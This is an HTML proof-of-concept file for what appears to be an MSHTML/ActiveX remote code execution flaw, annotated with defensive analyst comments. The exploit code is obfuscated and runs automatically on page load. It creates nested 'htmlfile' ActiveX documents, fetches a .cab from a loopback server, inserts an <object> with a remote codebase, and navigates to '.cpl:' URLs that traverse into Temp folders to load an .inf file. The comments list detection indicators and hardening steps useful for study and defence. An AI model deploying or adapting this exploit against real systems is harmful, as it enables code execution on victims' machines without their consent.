poc.html
<!DOCTYPE html>
<html>
<head>
<!-- Expires: -1 marks the page as already expired, so it is refetched rather than served from cache. -->
<meta http-equiv="Expires" content="-1">
<!-- X-UA-Compatible IE=11 asks an MSHTML host to render in IE11 document mode.
     The script in the body relies on ActiveXObject, which exists only in
     IE/MSHTML-based hosts. A page that sets both of these meta tags and then
     instantiates "htmlfile" objects is worth flagging during triage. -->
<meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
<script>
// Analyst notes (defensive reading of this proof-of-concept).
//
// Every member access below uses bracket notation with string keys, and the local
// names (`then`, `PL$22`, `opfilter`, `_0x4d7c02`, ...) are unrelated to what they
// hold. NOTE(review): this looks like obfuscator output; read each local by its
// right-hand side, not by its name.
//
// Observable behaviour, in order:
//   1. Builds a chain of "htmlfile" ActiveX documents, starting from a temporary iframe.
//   2. Issues a synchronous GET for a .cab file.
//   3. Inserts an <object> whose `codebase` points at the same .cab.
//   4. Navigates several htmlfile documents to ".cpl:" URLs whose relative paths
//      walk up to Temp directories and name an .inf file.
//
// Detection points visible in this file: an HTML page creating nested "htmlfile"
// objects, an <object> element with a remote .cab `codebase`, and ".cpl:" locations
// containing "../" traversal into AppData/Local/Temp. Hardening that removes the
// preconditions: keep MSHTML patched, block ActiveX control installation for
// untrusted zones, and open untrusted documents in a sandboxed/protected view.
function exploit() {
// Cache the document and prototype-level DOM methods so later calls go through
// `.call(...)` on these references instead of through instance properties.
var x = window["document"];
var then = window["Document"]["prototype"]["createElement"];
// Document.prototype.write is captured here but not referenced again in this function.
var _0x4d7c02 = window["Document"]["prototype"]["write"];
var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
// Create an iframe and attach it; fall back to <html> if <body> is not usable.
var range = then["call"](x, "iframe");
try {
PL$22["call"](x["body"], range);
} catch (errx) {
PL$22["call"](x["documentElement"], range);
}
// Take the ActiveXObject constructor from the iframe's window (not the page's own)
// and use it to create the first "htmlfile" document.
var ACTIVEX = range["contentWindow"]["ActiveXObject"];
var view = new ACTIVEX("htmlfile");
range["contentDocument"]["open"]()["close"]();
// Detach the iframe; `view` was created through its window before removal.
try {
opfilter["call"](x["body"], range);
} catch (err) {
opfilter["call"](x["documentElement"], range);
}
// Nest three more htmlfile documents, each created through the previous one's
// Script.ActiveXObject. `model` is the innermost and is the one used for the
// <object> insertion further down.
view["open"]()["close"]();
var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
mappedObj["open"]()["close"]();
var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
TokenType["open"]()["close"]();
var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
model["open"]()["close"]();
// Six further htmlfile documents created with the page's own ActiveXObject.
// Five are used below as navigation targets; `fake` is never referenced again.
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var wmp_test = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
// XMLHttpRequest open/send are taken from the prototype. setTimeout is captured
// as `newAttributes` but not used in this function.
var errors = window["XMLHttpRequest"];
var $node = new errors;
var directiveProcessors = errors["prototype"]["open"];
var nodeTypeRender = errors["prototype"]["send"];
var newAttributes = window["setTimeout"];
// `![]` evaluates to false, so this is a synchronous GET. The response is never
// read here. NOTE(review): presumably the request exists only for its side effect
// of fetching the file; confirm against network and cache artefacts.
// The URL is loopback in this copy, i.e. a local test server.
directiveProcessors["call"]($node, "GET", "http://127.0.0.1/calc.cab", ![]);
nodeTypeRender["call"]($node);
// Inside the innermost htmlfile document: write a <body>, then append an <object>
// with a `codebase` pointing at the same .cab and a fixed `classid`.
// NOTE(review): the CLSID is not resolved anywhere in this file; in IE, `codebase`
// is the location consulted to install a control that is not already registered.
// Verify what this CLSID maps to on the analysed host.
model["Script"]["document"]["write"]("<body>");
var PL$41 = then["call"](model["Script"]["document"], "object");
PL$41["setAttribute"]("codebase", "http://127.0.0.1/calc.cab#version=5,0,0,0");
PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](model["Script"]["document"]["body"], PL$41);
// The same ".cpl:123" location is assigned nine times to one htmlfile document.
// NOTE(review): the reason for the repetition is not visible in the code; it may
// be a delay or warm-up. Confirm dynamically.
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
// Navigations to ".cpl:" URLs with "../" traversal that all end in calc.inf under
// a Temp or Temp/Low directory, at different relative depths.
// NOTE(review): presumably one attempt per possible working directory or
// integrity level of the host process; verify.
// For triage, the stable indicators are the ".cpl:" scheme combined with a
// traversal path and an .inf target, not the specific depth.
iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/calc.inf";
rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/calc.inf";
wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/calc.inf";
doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/calc.inf";
a["Script"]["location"] = ".cpl:../../../../../Temp/Low/calc.inf";
doc["Script"]["location"] = ".cpl:../../../../../Temp/calc.inf";
doc["Script"]["location"] = ".cpl:../../Low/calc.inf";
doc["Script"]["location"] = ".cpl:../../calc.inf";
}
// Runs immediately while the page is parsed; no user interaction is required by the script itself.
exploit();
</script>
</body>
</html>